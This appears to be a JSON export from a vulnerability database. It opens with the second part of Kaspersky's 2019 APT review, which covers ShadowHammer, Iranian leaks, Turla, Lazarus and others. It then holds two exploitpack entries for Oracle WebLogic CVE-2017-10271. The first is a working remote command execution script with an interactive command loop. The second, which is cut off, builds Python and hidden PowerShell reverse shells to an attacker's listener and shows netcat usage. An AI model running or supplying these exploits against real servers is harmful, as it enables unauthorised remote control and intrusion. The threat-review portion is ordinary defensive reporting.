CCleaner](<https://www.wired.com/story/ccleaner-malware-targeted-tech-firms/>). In our [threat predictions for 2019](<https://securelist.com/kaspersky-security-bulletin-threat-predictions-for-2019/88878/>), we flagged this as a likely continuing attack vector. We didn't have to wait very long to see this prediction come true.\n\nIn January, we discovered a sophisticated supply-chain attack involving the update utility of a popular consumer hardware vendor \u2013 the mechanism used to deliver BIOS, UEFI and software updates to the vendor's laptops and desktops. 
The attackers behind Operation ShadowHammer added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it's possible that other samples exist that target different MAC addresses. You can read our reports on ShadowHammer [here](<https://securelist.com/operation-shadowhammer/89992/>) and [here](<https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/>).\n\n## Disinformation\n\nQ3 was interesting for APT developments in the Middle East, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.\n\nIn March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. They shared several files via Telegram that supposedly belonged to the OilRig threat actor. These included logins and passwords of several alleged hacking victims, tools, details of infrastructure potentially related to different intrusions, the r\u00e9sum\u00e9s of the alleged attackers and a list of web shells \u2013 apparently relating to the period 2014-18. The targeting and TTPs are consistent with the OilRig threat actor, but it was impossible to confirm the origins of the tools included in the dump. 
If the data in the dump is accurate, it would also show the global reach of the OilRig group, which most researchers had thought operates primarily in the Middle East.\n\nOn April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, \"along with information about their mother and spouse and etc.\" for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that they would put up for sale \"highly confidential\" information related to MuddyWater. On April 27, three screenshots were posted in the GreenLeakers Telegram channel containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status was changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.\n\nFinally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups. Interestingly, this leak differed from the others by employing a website that allowed anyone to browse the leaked documents. It also relied on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute's CNO (computer network operations) capabilities, as well as information about victims. 
Previous leaks had focused more on tools, source code and individual actor profiles.\n\nClose analysis of the materials, the infrastructure and the dedicated website used by the leakers provided clues that lead us to believe that Sofacy/Hades may be connected to these leaks.\n\n## Lost in Translation and Dark Universe\n\nThe well-known Shadow Brokers leak, Lost in Translation, included an interesting Python script \u2013 sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system \u2013 for example, a file with a unique name or registry path. Although some checks are empty, sigs.py lists 44 entries, many of them related to unknown APTs that have not yet been publicly described.\n\nIn 2019, we identified the APT described as the 27th function of the sigs.py file, which we call [DarkUniverse](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>). We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activities due to unique code overlaps.\n\nThe main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\n## Mobile attacks\n\nMobile implants are now a standard part of the toolset of many APT groups; and we have seen ample evidence of this during 2019.\n\nIn May, the [FT reported that hackers had exploited a zero-day vulnerability in WhatsApp](<https://www.ft.com/content/4da1117e-756c-11e9-be7d-6d846537acab>), enabling them to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance. 
To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The hackers apparently used this, not only to snoop on people's chats and calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. WhatsApp quickly released a patch for the exploit \u2013 and that seemed to be that. However, in October, the company filed a [lawsuit accusing Israel-based NSO Group of having created the exploit](<https://techcrunch.com/2019/10/29/whatsapp-spyware-nso-group/>). WhatsApp claims that the technology sold by NSO was used to target the mobile phones of more than 1,400 of its customers in 20 different countries, including human rights activists, journalists and others. NSO denies the allegations.\n\nIn July, we published a private report about the latest versions of FinSpy for Android and iOS, developed in mid-2018. The developers of FinSpy sell the software to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. The mobile implants are similar for iOS and Android. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It seems that the iOS solution does not provide infection exploits for its customers, but is fine-tuned to clean traces of publicly available jailbreaking tools: this suggests that physical access to the victim's device is required in cases where devices are not already jailbroken. 
The latest version includes multiple features that we have not observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims could be much higher.\n\nIn August, Google's Project Zero team published an extensive [analysis of at least 14 iOS zero-days](<https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html>) found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. According to Google, the attackers used a number of 'water-holed' websites to deliver the exploits \u2013 possibly from as long as three years ago. While the blog contained no details about the compromised sites, or whether they were still active, Google claimed the websites had received \"thousands of visitors per week\". The lack of victim discrimination points to a relatively non-targeted attack. However, the not-so-high estimate of the number of visitors to the water-holed sites, and the capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication.\n\nIn September, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS \u2013 the company is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has also reduced payouts for Apple one-click exploits. On the same day, someone found a high-severity zero-day in the V4L2 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google's September security update. 
A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message. Whatever the relative value of Android and iOS exploits, it's clear that mobile exploits are a valuable commodity.\n\n## Established threat actors continue to revamp their tools\n\nWhile investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.\n\nThis year, Turla also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the threat actor is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The group uses two KopiLuwak analogues \u2013 the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 for cyber-espionage; we believe Turla deploys these versions where their targets are protected with security software capable of detecting KopiLuwak.\n\nWe also observed a [new COMpfun-related targeted campaign](<https://securelist.com/compfun-successor-reductor/93633/>) using new malware. The Kaspersky Threat Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the attackers use the original COMpfun as a downloader in one of the spreading mechanisms. We named the newly identified modules Reductor after a .pdb path left in some of the samples. 
We believe the same COMPfun authors, who we tentatively associate with Turla based on victimology, developed this malware. One striking aspect of Reductor is that the threat actors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The authors don't touch the network packets at all. Instead, they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process's memory. Browsers use PRNG to generate the 'client random' sequence during the very beginning of the TLS handshake. Reductor adds the victims' unique encrypted hardware- and software-based identifiers to this 'client random' field.\n\nZebrocy has continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization. This module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. 
This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file-sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\nIn June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia that we attribute to Platinum \u2013 one of the most technologically advanced APT actors. In this campaign, the attackers used an elaborate, previously unseen steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof. Interestingly, the attackers decided to implement the utilities they need as one huge set \u2013 an example of the framework-based architecture that is becoming more and more popular. Later in the year, [we discovered Platinum using a new backdoor, which we call Titanium](<https://securelist.com/titanium-the-platinum-group-strikes-again/94961/>), in a new campaign. Interestingly, we found certain similarities between this malware and a toolset that we called ProjectC. We detected ProjectC in 2016 being used as a toolset for lateral movement and we attributed it with low confidence to CloudComputating. Our new findings lead us to believe that the CloudComputating set of activities can be attributed to Platinum and that ProjectC was one of its toolsets.\n\nOne of the key findings of our 2018 report on [Operation AppleJeus](<https://securelist.com/operation-applejeus/87553/>) was the ability of the Lazarus group to target Mac OS. Since then, Lazarus has expanded its operations for this platform. 
This year, we discovered a new operation, active for at least a year, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus also targeted a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It's clear that Lazarus keeps updating its tools very quickly.\n\nIn Q3, we tracked new activity by BlueNoroff, a sub-group of Lazarus. In particular, we identified a bank in Myanmar that this threat actor compromised. We promptly contacted the bank, to share the IoCs we had found. Our collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nAndariel, another sub-group of Lazarus, has traditionally focused on geo-political espionage and financial intelligence in South Korea. We observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. The malware is a brand new type of backdoor, called ApolloZeus, which is started by a shellcode wrapper with complex configuration data. 
This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign.\n\nIn October, we reported a campaign that began when we stumbled upon a sample that uses interesting decoy documents and images containing a contact list of North Korean overseas residents. Almost all of the decoys contain content regarding the national holiday of the Korean Peninsula and the national day of North Korea. The lure content was also related to diplomatic issues or business relationships. Alongside the additional data from our telemetry, we believe that this campaign is aimed at targets with a relationship with North Korea, such as business people, diplomatic entities and human rights organizations. The actor behind this campaign used high-profile spear phishing and multi-stage infection in order to implant tailored Ghost RAT malware that can fully control the victim. We believe that the threat actor behind this campaign, which has been ongoing for more than three years, speaks Korean; and we believe that the DarkHotel APT group is behind it.\n\nThe Lamberts is a family of sophisticated attack tools used by one or multiple threat actors. The arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a colour scheme to distinguish the various tools and implants used against different victims around the world. More information about the Lamberts arsenal is available in our 'Unraveling the Lamberts Toolkit' report, available to our APT Intel customers. This year, we added several new colours to the Lamberts palette. 
The Silver Lambert, which appears to be the successor of Gray Lambert, is a full-fledged backdoor, implementing some specific [NOBUS](<https://en.wikipedia.org/wiki/NOBUS>) and [OPSEC](<https://en.wikipedia.org/wiki/Operations_security>) concepts such as protection from C2 sink-holing by checking the server SSL certificate hash, self-uninstall for orphaned instances (i.e. where the C2 is unavailable) and low level file-wiping functionality. We observed victims of Silver Lambert in China, in the Aeronautics sector. Violet Lambert, a modular backdoor that appears to have been developed and deployed in 2018, is designed to run on various versions of Windows \u2013 including Windows XP, as well as Vista and later versions of Windows. We observed victims of Violet Lambert in the Middle East. We also found other new Lamberts implants on computers belonging to a critical infrastructure victim in the Middle East. The first two we dubbed Cyan Lambert (including Light and Pro versions). The third, which we called Magenta Lambert, reuses older Lamberts code and has multiple similarities with the Green, Black and White Lamberts. This malware listens on the network, waiting for a magic ping, and then executes a very well-hidden payload that we have been unable to decrypt. All the infected computers went offline shortly after our discovery.\n\nEarly in the year, we monitored a campaign by the LuckyMouse threat actor that had been targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We believe that this activity, which we call SpoiledLegacy, is the successor to the IronTiger campaign because of the similar tools and techniques it uses. The SpoiledLegacy operators use penetration-testing frameworks such as Cobalt Strike and Metasploit. 
While we believe that they exploit network service vulnerabilities as their main initial infection vector, we have also observed executables prepared for use in spear-phishing messages containing decoy documents, showing the operator's flexibility. Besides pen-testing frameworks, the operators use the NetBot downloader and Earthworm SOCKS tunneler. The attackers also include HTran TCP proxy source code into the malware, to redirect traffic. Some NetBot configuration data contains LAN IPs, indicating that it downloads the next stage from another infected host in the local network. Based on our telemetry, we believe that internal database servers are among the targets, as in a previous LuckyMouse Mongolian campaign. As the last stage, the attackers use different in-memory 32- and 64-bit Trojans injected into system process memory. Interestingly, all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code. From the start of 2019, we observed a spike in LuckyMouse activity, both in Central Asia and in the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. Despite different open-source publications discussing this actor's TTPs during the last year, LuckyMouse hasn't changed any of them. The threat actor still relies on its own tools to get a foothold in the victim's network, which in the new campaigns consists of using HTTPBrowser as a first stager, followed by the Soldier Trojan as a second stage implant. The group made a change to its infrastructure, as it seems to rely uniquely on IPv4 addresses instead of domain names for its C2s, which we see as an attempt to limit correlation.\n\nThe HoneyMyte APT has been active for several years. 
The group has adopted different techniques to perform its attacks over the past couple of years, and has targeted governments in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh, along with remote foreign embassies located in Pakistan, South Korea, the US, the UK, Belgium, Nepal, Australia and Singapore. This year, the group has targeted government organizations related to natural resource management in Myanmar and a major continental African organization, suggesting that one of the main motivations of HoneyMyte is gathering geopolitical and economic intelligence. While the group targeted a military organization in Bangladesh, it's possible that the individual targets were related to geo-political activity in the region.\n\nThe Icefog threat actor, which we have been tracking since 2011, has consistently targeted government institutions, military contractors, maritime and shipbuilding organizations, telecom operators, satellite operators, industrial and high technology companies, and mass media located mainly in Korea, Japan and Central Asia. Following [our original report on Icefog in 2013](<https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/>), the group's operational tempo slowed and we detected a very low number of active infections. We observed a slight increase in 2016; then, beginning in 2018, Icefog began conducting large waves of attacks against government institutions and military contractors in Central Asia, which are strategically important to China's Belt and Road Initiative. In the latest wave of attacks, the infection began with a spear-phishing email containing a malicious document that exploits a known vulnerability and ultimately deploys a payload. From 2018 to the beginning of 2019, the final payload was the typical Icefog backdoor. Since May 2019, the actors appear to have switched and are now using Poison Ivy as their main backdoor. 
The Poison Ivy payload is dropped as a malicious DLL and is loaded using a signed legitimate program, using a technique called load order hijacking. This technique is very common with many actors and it was also used in previous Icefog campaigns. During our investigation, we were also able to detect artefacts used in the actor's lateral movement. We observed the use of a public TCP scanner downloaded from GitHub, a Mimikatz variant to dump credentials from system memory, a customized keylogger to steal sensitive information, and a newer version of another backdoor named Quarian. The Quarian backdoor was used to create tunnels inside the victim infrastructure in an attempt to avoid network detections. The functionality of Quarian includes the ability to manipulate the remote file system, get information about the victim, steal saved passwords, download or upload arbitrary files, create tunnels using port forwarding, execute arbitrary commands, and start a reverse shell.\n\n## Evolution of the 'newcomers'\n\nWe first discussed ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia, in a private report in January 2018. Related activities date back to more than a decade ago, with similar code maintaining compilation timestamps from 2004. Since then, ShaggyPanther activity has been detected in several more locations: most recently in Indonesia in July, and \u2013 somewhat surprisingly \u2013 in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used web shell shared by multiple Chinese-speaking actors. SinoChopper not only performs host identification and backdoor delivery but also email archive theft and additional activity. 
Although not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019, we observed ShaggyPanther targeting Windows servers.\n\nIn April, we published our report on [TajMahal](<https://securelist.com/project-tajmahal/90240/>), a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System \u2013 one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named Tokyo and Yokohama and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. Our telemetry revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet. 
This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.\n\nIn February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows \u2013 the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we had discovered in the preceding months. Further analysis led us to uncover a zero-day vulnerability in win32k.sys. Microsoft patched this vulnerability, CVE-2019-0797, on March 12, crediting Kaspersky researchers Vasiliy Berdnikov and Boris Larin with the discovery. We think that several threat actors, including FruityArmor and SandCat, used this exploit. FruityArmor had used zero-days before, while SandCat is a new APT actor that we discovered not long before. Interestingly, FruityArmor and SandCat seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both groups with such artefacts.\n\nDuring February 2019, we observed a highly targeted attack in the southern part of Russia using a previously unknown malware that we call Cloudmid. This spy program spread via email and masqueraded as the VPN client of a well-known Russian security company that, among other things, provides solutions to protect networks. So far, we have been unable to relate this activity to any known actor. The malware itself is a simplistic document stealer. However, given its victimology and the targeted nature of the attack, we considered it relevant enough to monitor, even though we were unable to attribute this set of activities to any known actor. 
The low OPSEC and simplistic malware involved in this operation does not seem to point to an advanced threat actor.\n\nIn February, we identified a campaign targeting military organizations in India that we were unable to attribute to any known threat actor. The attackers rely on watering holes and spear phishing to infect their victims. Specifically, they were able to compromise the Centre for Land Warfare Studies (CLAWS) website, using it to host a malicious document used to distribute a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same period.\n\nIn Q3, we observed a campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and subsequently underwent constant development. We have only seen this malware used in a small number of active campaigns since January, all targeting government, military and diplomatic entities in the Southeast Asia region. The latest campaign, conducted in August, seems to have targeted only a select few individuals working for a military organization.\n\n## Privacy matters\n\nOn January 17, security researcher Troy Hunt reported a [leak of more than 773 million email and 21 million unique password records](<https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/>). The data, dubbed Collection #1, were originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1 TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this 'new' leak. 
It turned out that Collection #1 was just part of a [larger dump of leaked credentials comprising 2.2 billion stolen account records](<https://threatpost.com/collection-1-data-dump-hacker-identified/141447/>). The new data dump, dubbed Collection #2-5, was discovered by researchers at the Hasso Plattner Institute in Potsdam.\n\nIn February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, [were put up for sale on Dream Market](<https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/>), accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies [was posted](<https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/>) to the same marketplace. Then in March, the [hacker behind the earlier data dumps posted stolen data from a further six companies](<https://threatpost.com/fourth-credential-spill-dreammarket/142901/>).\n\nStolen credentials, along with other personal information harvested from data leaks, are valuable not only to cybercriminals but also to targeted attackers, including those wishing to [track the activities of dissidents and activists](<https://www.amnesty.org/en/latest/research/2019/03/phishing-attacks-using-third-party-applications-against-egyptian-civil-society-organizations/>) in various parts of the world.\n\nWe've become used to a steady stream of reports in the news about leaks of email addresses and passwords. The theft of such 'traditional' forms of authentication is bad enough, but the effects of using alternative methods of authentication can be much more serious. 
In August, [two Israeli researchers discovered](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>) fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. A compromised password can be changed, but a biometric characteristic is for life.\n\nMoreover, the more widespread use of smart devices in new areas of our lives opens up a bigger pool of data for attackers. Consider, for example, the potential impact of smart speakers for listening in on unguarded conversations in the home. Social media giants are sitting on a growing pile of personal information \u2013 information that would prove very valuable to criminals and APT threat actors alike.\n\n## Final thoughts\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)", "modified": "2019-12-04T10:00:22", "published": "2019-12-04T10:00:22", "id": "SECURELIST:C7E3F6A27205B506CE8683317323C0BC", "href": "https://securelist.com/ksb-2019-review-of-the-year/95394/", "type": "securelist", "title": "APT review: what the world\u2019s threat actors got up to in 2019", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "edition": 1, "published": "2017-12-26T00:00:00", "title": "Oracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "href": "", "sourceData": "import 
requests\nimport sys\n\nurl_in = sys.argv[1]\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\npayload_header = {'content-type': 'text/xml'}\n\n\ndef payload_command (command_in):\n html_escape_table = {\n \"&\": \"&\",\n '\"': \"\"\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n }\n command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\n \" <soapenv:Header> \" \\\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\n \" <void index = \\\"0\\\"> \" \\\n \" <string>cmd</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"1\\\"> \" \\\n \" <string>/c</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"2\\\"> \" \\\n + command_filtered + \\\n \" </void> \" \\\n \" </array>\" \\\n \" <void method=\\\"start\\\"/>\" \\\n \" </void>\" \\\n \" </java>\" \\\n \" </work:WorkContext>\" \\\n \" </soapenv:Header>\" \\\n \" <soapenv:Body/>\" \\\n \"</soapenv:Envelope>\"\n return payload_1\n\ndef do_post(command_in):\n result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)\n\n if result.status_code == 500:\n print \"Command Executed \\n\"\n else:\n print \"Something Went Wrong \\n\"\n\n\n\nprint \"***************************************************** \\n\" \\\n \"**************** Coded By 1337g ****************** \\n\" \\\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\n \"***************************************************** \\n\"\n\nwhile 1:\n command_in = raw_input(\"Eneter your command here: \")\n if command_in == \"exit\" : exit(0)\n do_post(command_in)", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "edition": 1, "published": "2018-01-03T00:00:00", "title": "Oracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EXPLOITPACK:E47A4ABCB334901131160C872A570166", "href": "", "sourceData": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\n# Date Authored: Jan 3, 2018\n# Date Announced: 10/19/2017\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\n# Exploit is based off of POC by Luffin from Github\n# https://github.com/Luffin/CVE-2017-10271\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\n# CVE: CVE-2017-10271\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\n# (Python 3) Example check listener: python3 -m http.server 4444\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\n# (Netcat) Example exploit listener: nc -nlvp 4444\n\nfrom sys import exit\nfrom requests import post\nfrom argparse import ArgumentParser\nfrom random import choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom xml.sax.saxutils import escape\n\nclass Exploit:\n\n def __init__(self, check, rhost, lhost, lport, windows):\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\n self.lhost = lhost\n self.lport = lport\n self.check = check\n if windows:\n self.target = 'win'\n else:\n self.target = 'unix'\n\n if self.target == 'unix':\n # Unix reverse shell\n # You should 
also be able to instead use something from MSFVenom. E.g.\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\n ).format(lhost=self.lhost, lport=self.lport)\n else:\n # Windows reverse shell\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 